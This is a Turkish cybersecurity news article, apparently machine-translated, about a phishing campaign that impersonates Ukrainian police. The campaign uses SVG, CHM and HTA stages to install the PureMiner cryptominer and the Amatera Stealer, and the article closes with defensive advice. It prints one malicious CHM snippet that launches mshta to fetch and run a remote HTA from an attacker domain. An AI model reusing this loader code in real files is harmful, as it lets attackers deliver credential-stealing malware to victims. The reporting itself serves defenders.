Son haftalarda, Pureminer Cryptominer’ı ve Amatera Stealer olarak adlandırılan bir veri çalma yükünü yaymak için tasarlanmış kötü amaçlı ölçeklenebilir vektör grafikleri (SVG) dosyalarıyla Ukrayna’daki organizasyonları hedefleyen sofistike bir kimlik avı kampanyası ortaya çıktı.
Saldırganlar Ukrayna polisi olarak maskelenerek, alıcıların bekleyen itirazları olduğunu iddia eden e -postalar gönderiyor.
Mağdurlar ekli SVG’yi açtıklarında, sonuçta sistem gizliliğini tehlikeye atan ve bilgi işlem kaynaklarını ele geçiren evraksız bir saldırı zincirini tetikler.
İlk enfeksiyon vektörleri olarak SVG eklerinin bu yeni kullanımı, saldırganların geleneksel e -posta filtrelerini ve uç nokta korumalarını atlamada artan yaratıcılığını göstermektedir.
SVG ekini açtıktan sonra, gömülü bir HTML iframe öğesi, saldırgan kontrollü bir alandan sessizce ikinci bir SVG yükler.
Bu SVG, aynı anda şifre korumalı bir arşiv indirirken, Ukrayna’da “Lütfen bekleyin, belgeniz yükleniyor…” mesajı ile sahte bir Adobe okuyucu arayüzü sunuyor.
.webp)
Mağdurlara arşiv şifresi gösterilir ve derlenmiş bir HTML Yardım (CHM) dosyasını çıkarmaya çağırılır. Fortinet analistleri, kötü amaçlı yazılımların tespit etmek ve kurbanları kötü niyetli içerik yürütmeye teşvik etmek için bu aldatıcı kullanıcı etkileşimine olan güvenini kaydetti.
Arşivin içinde bir CHM dosyası, gizli modda bir HTML uygulaması (HTA) çağıran bir HTML kısayol nesnesi içerir.
.webp)
Dize kodlama ve dizi karıştırma yoluyla gizlenen HTA komut dosyası, bir yükleyici görevi görür-saldırganın sunucusuna kalıcı bir bağlantı oluşturur, sistem bilgilerini Xorbase64 kodlu HTTP posta istekleri aracılığıyla püskürtür ve diğer komutları bekler.
SVG tabanlı filessiz bir zincirle pureminer enfeksiyon mekanizması
CHM’den çıkarılan kötü amaçlı HTM’den bir snippet, tıklama yönteminin mshta.exe’yi nasıl ortaya çıkardığını ve sonraki aşamalı yükü almak için nasıl gösterdiğini göstermektedir:-
[OBJECT id="shortcut" classid="clsid:52a2aaae-085d-4187-97ea-8c30db990436" width="1" height="1"]
[PARAM name="Command" value="ShortCut"]
[PARAM name="Item1" value=",cmd,/c mshta https://ms-team-ping2.com/smtp_test.hta"]
[/OBJECT]
[SCRIPT]shortcut.Click();[/SCRIPT]Enfeksiyon mekanizması iki farklı filulsuz yük teslimatı ile devam eder. Birincisi, ergosystem.zip adlı bir zip arşivi, işlem oyukunu kullanarak kötü niyetli bir DLL kenar yükleyen meşru bir .NET aracı içerir.
.webp)
Pureminer olarak tanımlanan enjekte edilen yük, konfigürasyonunu protobuf serileştirilmiş bir blobdan çözer, AMD ve NVIDIA kütüphanelerini kullanarak donanım ayrıntılarını toplar ve CPU- veya GPU tabanlı madencilik modüllerini başlatır.
İkinci arşivde, bir Python tercümanı ve PythonMemoryModule SMTPB.ZIP, Amatera Stealer’ı doğrudan belleğe yüklemek için kaldırılır.
Bu stealer, HTTP GET aracılığıyla RC4 şifreli bir yapılandırma ister, bellekte kod çözer ve kimlik bilgilerini, tarayıcı artefaktlarını ve kripto para birimi cüzdan dosyalarını hasat etmek için direktifleri ayrıştırır.
İlk SVG dağıtımından çift yük uygulamasına kadar, bu kampanya, filessiz taktiklerin sorunsuz bir şekilde ilerlemesini ve meşru uygulama kötüye kullanımını örneklendirir.
Saldırganlar, SVG dosyalarını HTML sargıları olarak silahlandırarak ve CHM ve HTA aşamalarında zincirleyerek imza tabanlı savunmalardan kaçınır ve kullanıcıların ortak belge formatlarına olan güvenini kullanırlar.
Siber güvenlik ekipleri, CHM ve HTA uygulamalarının kısıtlanmasını sağlarken, SVG ataşmanlarını gömülü IFRAMS için incelemeli ve MSHTA.EXE çağrılarını izlemelidir.
Uç nokta davranışsal analitik ile birleştiğinde uygun URL filtreleme ve arşiv parola istemleri, veri tehlikeye atmadan veya sistem kaynaklarını ele geçirmeden önce bu enfeksiyon mekanizmasını bozabilir.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
